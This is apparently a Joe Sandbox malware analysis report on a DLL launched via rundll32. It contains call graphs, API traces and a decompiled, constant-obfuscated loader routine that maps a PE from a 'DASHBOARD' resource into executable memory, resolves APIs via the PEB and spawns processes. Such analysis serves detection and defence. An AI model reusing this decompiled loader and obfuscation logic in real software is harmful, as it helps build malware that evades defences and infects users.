type_info::_Type_info_dtor 32017->32019 32018 1002faee __dosmaperr type_info::_Type_info_dtor 32018->31962 32019->32018 32029 1002fab4 32019->32029 32052 10035a99 67 API calls 2 library calls 32019->32052 32020 1002fac9 HeapFree 32020->32018 32022 1002fadb 32020->32022 32055 100311f4 67 API calls __getptd_noexit 32022->32055 32024 1002fae0 GetLastError 32024->32018 32025 1002faa6 32054 1002fabf LeaveCriticalSection _doexit 32025->32054 32026 1002fa8c ___sbh_find_block 32026->32025 32053 10035b3d VirtualFree VirtualFree HeapFree __cftoe2_l 32026->32053 32029->32018 32029->32020 32030->31928 32031->31989 32032->31993 32034 10030684 type_info::_Type_info_dtor 32033->32034 32035 1003069c 32034->32035 32045 100306bb _memset 32034->32045 32046 100311f4 67 API calls __getptd_noexit 32035->32046 32037 100306a1 32047 10037753 4 API calls 2 library calls 32037->32047 32039 1003072d RtlAllocateHeap 32039->32045 32042 100306b1 type_info::_Type_info_dtor 32042->31997 32045->32039 32045->32042 32048 10035a99 67 API calls 2 library calls 32045->32048 32049 100362e6 5 API calls 2 library calls 32045->32049 32050 10030774 LeaveCriticalSection _doexit 32045->32050 32051 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32045->32051 32046->32037 32048->32045 32049->32045 32050->32045 32051->32045 32052->32026 32053->32025 32054->32029 32055->32024 32057 1002f9a6 _malloc 67 API calls 32056->32057 32058 10006aa1 32057->32058 32059 1002fa69 __output_s_l 67 API calls 32058->32059 32060 10006aad 32058->32060 32059->32060 32060->31966 32060->31967 32062 1002fb18 32061->32062 32063 1002fb3f __VEC_memcpy 32062->32063 32064 100127eb 32062->32064 32063->32064 32065 1002f9a6 32064->32065 32066 1002fa53 32065->32066 32077 1002f9b4 32065->32077 32099 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32066->32099 32068 1002fa59 32100 100311f4 67 API calls __getptd_noexit 32068->32100 32071 1002fa5f 32071->31980 32074 1002fa17 RtlAllocateHeap 32074->32077 32075 1002f9c9 32075->32077 32092 10036892 67 API calls __NMSG_WRITE 32075->32092 32093 100366f2 67 API calls 7 library calls 32075->32093 32094 10030e7b GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 32075->32094 32077->32074 32077->32075 32078 1002fa4a 32077->32078 32079 1002fa3e 32077->32079 32082 1002fa3c 32077->32082 32095 1002f957 67 API calls 4 library calls 32077->32095 32096 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32077->32096 32078->31980 32097 100311f4 67 API calls __getptd_noexit 32079->32097 32098 100311f4 67 API calls __getptd_noexit 32082->32098 32085 1002f9a6 _malloc 67 API calls 32084->32085 32086 10002990 32085->32086 32086->31982 32101 10002280 32087->32101 32090->31984 32091->31972 32092->32075 32093->32075 32095->32077 32096->32077 32097->32082 32098->32078 32099->32068 32100->32071 32138 10001990 32101->32138 32104 100022c3 SetLastError 32135 100022a9 32104->32135 32105 100022d5 32106 10001990 ___DllMainCRTStartup SetLastError 32105->32106 32107 100022ee 32106->32107 32108 10002310 SetLastError 32107->32108 32109 10002322 32107->32109 32107->32135 32108->32135 32110 10002331 SetLastError 32109->32110 32111 10002343 32109->32111 32110->32135 32112 1000234e SetLastError 32111->32112 32114 10002360 GetNativeSystemInfo 32111->32114 32112->32135 32115 10002414 SetLastError 32114->32115 32116 10002426 VirtualAlloc 32114->32116 32115->32135 32117 10002472 GetProcessHeap HeapAlloc 32116->32117 32118 10002447 VirtualAlloc 32116->32118 32120 100024ac 32117->32120 32121 1000248c VirtualFree SetLastError 32117->32121 32118->32117 32119 10002463 SetLastError 32118->32119 32119->32135 32122 10001990 ___DllMainCRTStartup SetLastError 32120->32122 32121->32135 32123 1000250e 32122->32123 32124 10002512 32123->32124 32125 1000251c VirtualAlloc 32123->32125 32176 10002840 VirtualFree VirtualFree GetProcessHeap HeapFree ___DllMainCRTStartup 32124->32176 32126 1000254b ___DllMainCRTStartup 32125->32126 32141 100019c0 32126->32141 32129 1000257f ___DllMainCRTStartup 32129->32124 32151 10001ff0 32129->32151 32133 100025e8 ___DllMainCRTStartup 32133->32124 32133->32135 32170 37e991 32133->32170 32135->31984 32136 1000264f SetLastError 32136->32124 32139 100019ab 32138->32139 32140 1000199f SetLastError 32138->32140 32139->32104 32139->32105 32139->32135 32140->32139 32142 100019f0 32141->32142 32143 10001a83 32142->32143 32145 10001a2c VirtualAlloc 32142->32145 32150 10001aa0 ___DllMainCRTStartup 32142->32150 32144 10001990 ___DllMainCRTStartup SetLastError 32143->32144 32146 10001a9c 32144->32146 32147 10001a50 32145->32147 32148 10001a57 ___DllMainCRTStartup 32145->32148 32149 10001aa4 VirtualAlloc 32146->32149 32146->32150 32147->32150 32148->32142 32149->32150 32150->32129 32152 10002029 IsBadReadPtr 32151->32152 32161 1000201f 32151->32161 32154 10002053 32152->32154 32152->32161 32155 10002085 SetLastError 32154->32155 32156 10002099 32154->32156 32154->32161 32155->32161 32177 100018b0 VirtualQuery VirtualFree VirtualAlloc ___DllMainCRTStartup 32156->32177 32158 100020b3 32159 100020bf SetLastError 32158->32159 32162 100020e9 32158->32162 32159->32161 32161->32124 32164 10001cb0 32161->32164 32162->32161 32163 100021f9 SetLastError 32162->32163 32163->32161 32165 10001cf8 ___DllMainCRTStartup 32164->32165 32166 10001e01 32165->32166 32168 10001ddd 32165->32168 32178 10001b80 32165->32178 32167 10001b80 ___DllMainCRTStartup 2 API calls 32166->32167 32167->32168 32168->32133 32171 37ea62 32170->32171 32175 37ea8d 32170->32175 32185 37f8fd 32171->32185 32175->32135 32175->32136 32176->32135 32177->32158 32179 10001b9c 32178->32179 32181 10001b92 32178->32181 32180 10001baa 32179->32180 32183 10001c04 VirtualProtect 32179->32183 32180->32181 32184 10001be2 VirtualFree 32180->32184 32181->32165 32183->32181 32184->32181 32195 37fde0 32185->32195 32186 37ffd1 32209 37ab87 32186->32209 32189 37ea75 32189->32175 32198 3793ed 32189->32198 32192 38dcf7 GetPEB 32192->32195 32195->32186 32195->32189 32195->32192 32196 37a8b0 GetPEB 32195->32196 32201 37b23c 32195->32201 32205 3846bb 32195->32205 32219 38da22 GetPEB 32195->32219 32220 3747ce GetPEB 32195->32220 32221 37f899 GetPEB 32195->32221 32222 374b61 32195->32222 32196->32195 32199 38aa30 GetPEB 32198->32199 32200 379456 ExitProcess 32199->32200 32200->32175 32202 37b254 32201->32202 32226 38aa30 32202->32226 32206 3846da 32205->32206 32207 38aa30 GetPEB 32206->32207 32208 384729 SHGetFolderPathW 32207->32208 32208->32195 32210 37abb0 32209->32210 32211 374b61 GetPEB 32210->32211 32212 37ad67 32211->32212 32234 377f5d 32212->32234 32214 37ad99 32215 37ada4 32214->32215 32238 381e67 GetPEB 32214->32238 32215->32189 32217 37adc4 32239 381e67 GetPEB 32217->32239 32219->32195 32220->32195 32221->32195 32223 374b74 32222->32223 32240 371ea7 32223->32240 32227 38ab1d 32226->32227 32228 37b2b8 lstrcmpiW 32226->32228 32232 380a0e GetPEB 32227->32232 32228->32195 32230 38ab33 32233 37cdcd GetPEB 32230->32233 32232->32230 32233->32228 32235 377f8e 32234->32235 32236 38aa30 GetPEB 32235->32236 32237 377fd4 CreateProcessW 32236->32237 32237->32214 32238->32217 32239->32215 32241 371ebc 32240->32241 32244 37702c 32241->32244 32245 377049 32244->32245 32246 38aa30 GetPEB 32245->32246 32247 371f4c 32246->32247 32247->32195

                                                                                                                                                            Executed Functions

                                                                                                                                                            Function 100125C0 Relevance: 45.7, APIs: 7, Strings: 19, Instructions: 165memoryCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                                                            • _printf.LIBCMT ref: 1001265F
                                                                                                                                                            • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                                                            • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
                                                                                                                                                            • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,-100510CC,00000040), ref: 100127D1
                                                                                                                                                            • _malloc.LIBCMT ref: 100127F5
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                                                            • String ID: .$.$2$3$6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0$DASHBOARD$d$d$e$kre3.l$l$l$l$l$l$l$l$n$ndldl
                                                                                                                                                            • API String ID: 572389289-2839844625
                                                                                                                                                            • Opcode ID: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                                                            • Instruction ID: 8f66a7c676ce8d0fa2ca8bd8519024a549b55f77dd79b918ae70bd0eec3b217e
                                                                                                                                                            • Opcode Fuzzy Hash: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                                                            • Instruction Fuzzy Hash: FB613EB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10002280 Relevance: 22.8, APIs: 15, Instructions: 331COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 36 10002280-100022a7 call 10001990 39 100022b0-100022c1 36->39 40 100022a9-100022ab 36->40 42 100022c3-100022d0 SetLastError 39->42 43 100022d5-100022f0 call 10001990 39->43 41 1000269a-1000269d 40->41 42->41 46 100022f2-100022f4 43->46 47 100022f9-1000230e 43->47 46->41 48 10002310-1000231d SetLastError 47->48 49 10002322-1000232f 47->49 48->41 50 10002331-1000233e SetLastError 49->50 51 10002343-1000234c 49->51 50->41 52 10002360-10002381 51->52 53 1000234e-1000235b SetLastError 51->53 54 10002395-1000239f 52->54 53->41 55 100023a1-100023a8 54->55 56 100023d7-10002412 GetNativeSystemInfo 54->56 57 100023b8-100023c4 55->57 58 100023aa-100023b6 55->58 59 10002414-10002421 SetLastError 56->59 60 10002426-10002445 VirtualAlloc 56->60 61 100023c7-100023cd 57->61 58->61 59->41 62 10002472-1000248a GetProcessHeap HeapAlloc 60->62 63 10002447-10002461 VirtualAlloc 60->63 64 100023d5 61->64 65 100023cf-100023d2 61->65 67 100024ac-10002510 call 10001990 62->67 68 1000248c-100024a7 VirtualFree SetLastError 62->68 63->62 66 10002463-1000246d SetLastError 63->66 64->54 65->64 66->41 72 10002512 67->72 73 1000251c-10002581 VirtualAlloc call 10001810 call 100019c0 67->73 68->41 74 1000268c-10002698 call 10002840 72->74 81 10002583 73->81 82 1000258d-1000259e 73->82 74->41 81->74 83 100025a0-100025b6 call 10001eb0 82->83 84 100025b8-100025bb 82->84 86 100025c2-100025d0 call 10001ff0 83->86 84->86 90 100025d2 86->90 91 100025dc-100025ea call 10001cb0 86->91 90->74 94 100025f6-10002604 call 10001e30 91->94 95 100025ec 91->95 98 10002606 94->98 99 1000260d-10002616 94->99 95->74 98->74 100 10002618-1000261f 99->100 101 1000267d-10002680 99->101 103 10002621-10002643 call 37e991 100->103 104 1000266a-10002678 100->104 102 10002687-1000268a 101->102 102->41 106 10002646-1000264d 103->106 105 1000267b 104->105 105->102 107 1000265e-10002668 106->107 108 1000264f-1000265a SetLastError 106->108 107->105 108->74
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                                                            • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                            • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                                                            • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                                                            • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                                                            • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0037F8FD Relevance: 11.6, Strings: 9, Instructions: 353COMMONCrypto
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 148 37f8fd-37fddc 149 37fde0-37fde6 148->149 150 37ffa3-37ffbe call 374b61 149->150 151 37fdec-37fdf2 149->151 161 37ffc3-37ffc9 150->161 152 37ffd1-37ffe9 call 37ab87 151->152 153 37fdf8-37fdfe 151->153 162 37ffee-37fff3 152->162 155 37fe04-37fe0a 153->155 156 37ff5e-37ff64 153->156 159 37fe10-37fe16 155->159 160 37ff49-37ff59 call 37f899 155->160 163 37ff66-37ff6a 156->163 164 37ff99-37ff9e 156->164 167 37fe8f-37feae call 3846bb 159->167 168 37fe18-37fe1e 159->168 160->149 161->149 169 37ffcf 161->169 171 37fff4-380000 162->171 165 37ff91-37ff97 163->165 166 37ff6c-37ff73 163->166 164->149 165->163 165->164 172 37ff81-37ff8a 166->172 176 37feb3-37ff44 call 38da22 call 38dcf7 call 3747ce call 37a8b0 167->176 168->161 174 37fe24-37fe5e call 38dcf7 call 37b23c 168->174 169->171 177 37ff75-37ff79 172->177 178 37ff8c-37ff8e 172->178 186 37fe63-37fe8a call 37a8b0 174->186 176->149 177->178 180 37ff7b-37ff7e 177->180 178->165 180->172 186->161
                                                                                                                                                            C-Code - Quality: 80%
                                                                                                                                                            			E0037F8FD() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed short* _t368;
				signed int _t381;
				signed int* _t383;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t405;
				signed int* _t438;
				void* _t439;
				signed short* _t445;
				signed int* _t446;

				_t446 =  &_v1700;
				_v1636 = 0x636551;
				_t2 =  &_v1636; // 0x636551
				_t385 = 0x5e;
				_v1636 =  *_t2 / _t385;
				_t383 = 0;
				_t386 = 0x7a;
				_t439 = 0x12dab9f;
				_v1636 = _v1636 * 0x55;
				_v1636 = _v1636 ^ 0x0059e0ec;
				_v1616 = 0x84ec4b;
				_v1616 = _v1616 + 0xffff958e;
				_v1616 = _v1616 << 6;
				_v1616 = _v1616 ^ 0x212f9cfc;
				_v1624 = 0x57c2af;
				_v1624 = _v1624 / _t386;
				_v1624 = _v1624 >> 0xa;
				_v1624 = _v1624 ^ 0x000a9340;
				_v1676 = 0x94d6a3;
				_v1676 = _v1676 >> 3;
				_t387 = 0x41;
				_v1676 = _v1676 * 0x79;
				_v1676 = _v1676 * 0x68;
				_v1676 = _v1676 ^ 0x9280c2f7;
				_v1644 = 0x578290;
				_v1644 = _v1644 | 0x80e552f7;
				_v1644 = _v1644 + 0xffffd80b;
				_v1644 = _v1644 ^ 0x80feae5e;
				_v1652 = 0x70c956;
				_v1652 = _v1652 ^ 0x31ba76f8;
				_v1652 = _v1652 ^ 0x87f2510e;
				_v1652 = _v1652 ^ 0xb63594c0;
				_v1696 = 0x39dcdb;
				_v1696 = _v1696 * 0x22;
				_v1696 = _v1696 >> 0xf;
				_v1696 = _v1696 * 0x75;
				_v1696 = _v1696 ^ 0x000247c6;
				_v1572 = 0x793846;
				_v1572 = _v1572 + 0xfc60;
				_v1572 = _v1572 ^ 0x007fa213;
				_v1576 = 0x3629f6;
				_v1576 = _v1576 | 0x7f6cc17b;
				_v1576 = _v1576 ^ 0x7f7c74a2;
				_v1600 = 0x630dc0;
				_v1600 = _v1600 | 0x8a3170d6;
				_v1600 = _v1600 ^ 0x8a7fe201;
				_v1664 = 0xe79625;
				_v1664 = _v1664 * 0x57;
				_v1664 = _v1664 ^ 0xe47ae09a;
				_v1664 = _v1664 + 0xffff598f;
				_v1664 = _v1664 ^ 0xaac0e7d1;
				_v1648 = 0xac147c;
				_v1648 = _v1648 << 4;
				_v1648 = _v1648 / _t387;
				_v1648 = _v1648 ^ 0x00264750;
				_v1588 = 0x745952;
				_t98 =  &_v1588; // 0x745952
				_v1588 =  *_t98 * 0x3a;
				_v1588 = _v1588 ^ 0x1a53f4d8;
				_v1672 = 0x57a21b;
				_t388 = 0x49;
				_v1672 = _v1672 / _t388;
				_t389 = 0x63;
				_v1672 = _v1672 / _t389;
				_v1672 = _v1672 | 0xd6f4ed27;
				_v1672 = _v1672 ^ 0xd6feee0f;
				_v1620 = 0xc904e8;
				_t390 = 0x17;
				_v1620 = _v1620 * 0x6d;
				_v1620 = _v1620 + 0x178d;
				_v1620 = _v1620 ^ 0x5592dda0;
				_v1688 = 0x59d198;
				_v1688 = _v1688 | 0x5938a823;
				_v1688 = _v1688 ^ 0x788d0eee;
				_v1688 = _v1688 + 0xffff1978;
				_v1688 = _v1688 ^ 0x21fe2fab;
				_v1612 = 0xa097a2;
				_v1612 = _v1612 << 9;
				_v1612 = _v1612 / _t390;
				_v1612 = _v1612 ^ 0x02dc2d90;
				_v1700 = 0xb7b4a0;
				_t391 = 0x36;
				_v1700 = _v1700 / _t391;
				_v1700 = _v1700 >> 1;
				_v1700 = _v1700 | 0xee164e4b;
				_v1700 = _v1700 ^ 0xee1e6de5;
				_v1680 = 0xe4ad14;
				_v1680 = _v1680 | 0xe839ddc8;
				_v1680 = _v1680 ^ 0xfe881b96;
				_t392 = 0x42;
				_v1680 = _v1680 * 0x4e;
				_v1680 = _v1680 ^ 0xd7ed2c6e;
				_v1656 = 0xa710a4;
				_v1656 = _v1656 + 0xfffff8f1;
				_v1656 = _v1656 ^ 0xcc5b21c1;
				_v1656 = _v1656 ^ 0xccf98fb8;
				_v1628 = 0x5fc40d;
				_v1628 = _v1628 + 0xb682;
				_v1628 = _v1628 << 6;
				_v1628 = _v1628 ^ 0x181c8c04;
				_v1640 = 0xd7aa78;
				_v1640 = _v1640 + 0x8e1d;
				_v1640 = _v1640 / _t392;
				_v1640 = _v1640 ^ 0x0007a72a;
				_v1580 = 0xbf48f6;
				_t393 = 0x25;
				_v1580 = _v1580 * 0xd;
				_v1580 = _v1580 ^ 0x09b7b49e;
				_v1564 = 0xff195;
				_v1564 = _v1564 + 0x8c1b;
				_v1564 = _v1564 ^ 0x00104e06;
				_v1684 = 0xbf1e83;
				_v1684 = _v1684 / _t393;
				_t394 = 0x77;
				_v1684 = _v1684 / _t394;
				_v1684 = _v1684 + 0xa662;
				_v1684 = _v1684 ^ 0x0006fc0d;
				_v1596 = 0xc39bae;
				_v1596 = _v1596 << 2;
				_v1596 = _v1596 ^ 0x030cfbaf;
				_v1568 = 0x66568e;
				_v1568 = _v1568 | 0x44ac0d6e;
				_v1568 = _v1568 ^ 0x44e9cf2b;
				_v1692 = 0x3d2b27;
				_v1692 = _v1692 + 0x3fae;
				_t395 = 0x71;
				_v1692 = _v1692 / _t395;
				_v1692 = _v1692 + 0xffff1a11;
				_v1692 = _v1692 ^ 0xffffbf57;
				_v1632 = 0xb4dfda;
				_v1632 = _v1632 * 9;
				_v1632 = _v1632 >> 3;
				_v1632 = _v1632 ^ 0x00c4553b;
				_v1584 = 0x206e7a;
				_v1584 = _v1584 << 7;
				_v1584 = _v1584 ^ 0x10371375;
				_v1592 = 0x689459;
				_v1592 = _v1592 + 0xffffb773;
				_v1592 = _v1592 ^ 0x00637077;
				_v1660 = 0x8b14df;
				_v1660 = _v1660 << 0xd;
				_v1660 = _v1660 + 0x9803;
				_v1660 = _v1660 << 0xa;
				_v1660 = _v1660 ^ 0x71eeeb6f;
				_v1608 = 0x8e767e;
				_v1608 = _v1608 | 0xfaf7fbb6;
				_v1608 = _v1608 ^ 0xfaf9bdf5;
				_v1668 = 0xccd677;
				_v1668 = _v1668 * 0x78;
				_v1668 = _v1668 + 0xffff6b3d;
				_v1668 = _v1668 + 0xf0ff;
				_v1668 = _v1668 ^ 0x600a3b9e;
				_v1604 = 0x7c05f9;
				_v1604 = _v1604 + 0xd55a;
				_v1604 = _v1604 ^ 0x007aedaa;
				_t445 = _v1604;
				while(_t439 != 0x12dab9f) {
					if(_t439 == 0x2f8e73a) {
						_push(_v1604);
						_push(_t383);
						_push(_t395);
						_push(_t383);
						_push(_t383);
						_push(_v1668);
						_push(_t445);
						E0037AB87(_v1660, _v1608, __eflags);
						_t383 = 1;
						__eflags = 1;
						L23:
						return _t383;
					}
					if(_t439 == 0x92208ae) {
						_t368 = _t445;
						__eflags =  *_t445 - _t383;
						if(__eflags == 0) {
							L18:
							_t439 = 0xeef82b0;
							continue;
						} else {
							goto L11;
						}
						do {
							L11:
							__eflags =  *_t368 - 0x2c;
							if( *_t368 != 0x2c) {
								goto L17;
							}
							_t438 =  &_v1560;
							while(1) {
								_t368 =  &(_t368[1]);
								_t405 =  *_t368 & 0x0000ffff;
								__eflags = _t405;
								if(_t405 == 0) {
									break;
								}
								__eflags = _t405 - 0x20;
								if(_t405 == 0x20) {
									break;
								}
								 *_t438 = _t405;
								_t438 =  &(_t438[0]);
								__eflags = _t438;
							}
							_t395 = 0;
							__eflags = 0;
							 *_t438 = 0;
							L17:
							_t368 =  &(_t368[1]);
							__eflags =  *_t368 - _t383;
						} while (__eflags != 0);
						goto L18;
					}
					if(_t439 == 0x99a67ee) {
						_t445 = E0037F899(_t395);
						_t439 = 0x92208ae;
						continue;
					}
					if(_t439 == 0x9e65a83) {
						_push(_v1612);
						_push(_v1636);
						_push(_v1688);
						_push( &_v520); // executed
						E003846BB(_v1672, _v1620); // executed
						E0038DA22(_v1700, _v1680, __eflags, _v1656,  &_v1040, _v1672, _v1628);
						_push(_v1564);
						_push(_v1580);
						E003747CE( &_v520, _v1684, _v1640, _v1596, _v1568, E0038DCF7(_v1640, 0x371140, __eflags),  &_v1040, _v1692, _v1632);
						_t395 = _v1584;
						E0037A8B0(_t395, _t375, _v1592);
						_t446 = _t446 - 0xc + 0x58;
						_t439 = 0x2f8e73a;
						continue;
					}
					_t457 = _t439 - 0xeef82b0;
					if(_t439 == 0xeef82b0) {
						_push(_v1696);
						_push(_v1652);
						_t381 = E0037B23C(_v1572, _v1576, E0038DCF7(_v1644, 0x3710c0, _t457), _v1600, _v1664,  &_v1560); // executed
						_t395 = _v1648;
						asm("sbb edi, edi");
						_t439 = ( ~_t381 & 0xfbf501ac) + 0xdf158d7;
						E0037A8B0(_t395, _t379, _v1588);
						_t446 =  &(_t446[7]);
					}
					L20:
					if(_t439 != 0xdf158d7) {
						continue;
					}
					goto L23;
				}
				E00374B61( &_v1560, 0x208, _v1616, _v1624);
				_pop(_t395);
				_t439 = 0x99a67ee;
				goto L20;
			}




























































                                                                                                                                                            0x0037f8fd
                                                                                                                                                            0x0037f903
                                                                                                                                                            0x0037f90d
                                                                                                                                                            0x0037f917
                                                                                                                                                            0x0037f91c
                                                                                                                                                            0x0037f927
                                                                                                                                                            0x0037f929
                                                                                                                                                            0x0037f92c
                                                                                                                                                            0x0037f931
                                                                                                                                                            0x0037f935
                                                                                                                                                            0x0037f93d
                                                                                                                                                            0x0037f945
                                                                                                                                                            0x0037f94d
                                                                                                                                                            0x0037f952
                                                                                                                                                            0x0037f95a
                                                                                                                                                            0x0037f96a
                                                                                                                                                            0x0037f96e
                                                                                                                                                            0x0037f973
                                                                                                                                                            0x0037f97b
                                                                                                                                                            0x0037f983
                                                                                                                                                            0x0037f98d
                                                                                                                                                            0x0037f98e
                                                                                                                                                            0x0037f997
                                                                                                                                                            0x0037f99b
                                                                                                                                                            0x0037f9a3
                                                                                                                                                            0x0037f9ab
                                                                                                                                                            0x0037f9b3
                                                                                                                                                            0x0037f9bb
                                                                                                                                                            0x0037f9c3
                                                                                                                                                            0x0037f9cb
                                                                                                                                                            0x0037f9d3
                                                                                                                                                            0x0037f9db
                                                                                                                                                            0x0037f9e3
                                                                                                                                                            0x0037f9f0
                                                                                                                                                            0x0037f9f4
                                                                                                                                                            0x0037f9fe
                                                                                                                                                            0x0037fa02
                                                                                                                                                            0x0037fa0a
                                                                                                                                                            0x0037fa15
                                                                                                                                                            0x0037fa20
                                                                                                                                                            0x0037fa2b
                                                                                                                                                            0x0037fa36
                                                                                                                                                            0x0037fa41
                                                                                                                                                            0x0037fa4c
                                                                                                                                                            0x0037fa54
                                                                                                                                                            0x0037fa5c
                                                                                                                                                            0x0037fa64
                                                                                                                                                            0x0037fa71
                                                                                                                                                            0x0037fa75
                                                                                                                                                            0x0037fa7d
                                                                                                                                                            0x0037fa85
                                                                                                                                                            0x0037fa8d
                                                                                                                                                            0x0037fa95
                                                                                                                                                            0x0037faa0
                                                                                                                                                            0x0037faa4
                                                                                                                                                            0x0037faac
                                                                                                                                                            0x0037fab7
                                                                                                                                                            0x0037fabf
                                                                                                                                                            0x0037fac6
                                                                                                                                                            0x0037fad1
                                                                                                                                                            0x0037fae1
                                                                                                                                                            0x0037fae6
                                                                                                                                                            0x0037faf0
                                                                                                                                                            0x0037faf5
                                                                                                                                                            0x0037fafb
                                                                                                                                                            0x0037fb03
                                                                                                                                                            0x0037fb0b
                                                                                                                                                            0x0037fb18
                                                                                                                                                            0x0037fb1b
                                                                                                                                                            0x0037fb1f
                                                                                                                                                            0x0037fb27
                                                                                                                                                            0x0037fb2f
                                                                                                                                                            0x0037fb37
                                                                                                                                                            0x0037fb3f
                                                                                                                                                            0x0037fb47
                                                                                                                                                            0x0037fb4f
                                                                                                                                                            0x0037fb57
                                                                                                                                                            0x0037fb5f
                                                                                                                                                            0x0037fb6c
                                                                                                                                                            0x0037fb70
                                                                                                                                                            0x0037fb78
                                                                                                                                                            0x0037fb84
                                                                                                                                                            0x0037fb89
                                                                                                                                                            0x0037fb8f
                                                                                                                                                            0x0037fb93
                                                                                                                                                            0x0037fb9b
                                                                                                                                                            0x0037fba3
                                                                                                                                                            0x0037fbab
                                                                                                                                                            0x0037fbb3
                                                                                                                                                            0x0037fbc0
                                                                                                                                                            0x0037fbc3
                                                                                                                                                            0x0037fbc7
                                                                                                                                                            0x0037fbcf
                                                                                                                                                            0x0037fbd7
                                                                                                                                                            0x0037fbdf
                                                                                                                                                            0x0037fbe7
                                                                                                                                                            0x0037fbef
                                                                                                                                                            0x0037fbf7
                                                                                                                                                            0x0037fbff
                                                                                                                                                            0x0037fc04
                                                                                                                                                            0x0037fc0c
                                                                                                                                                            0x0037fc14
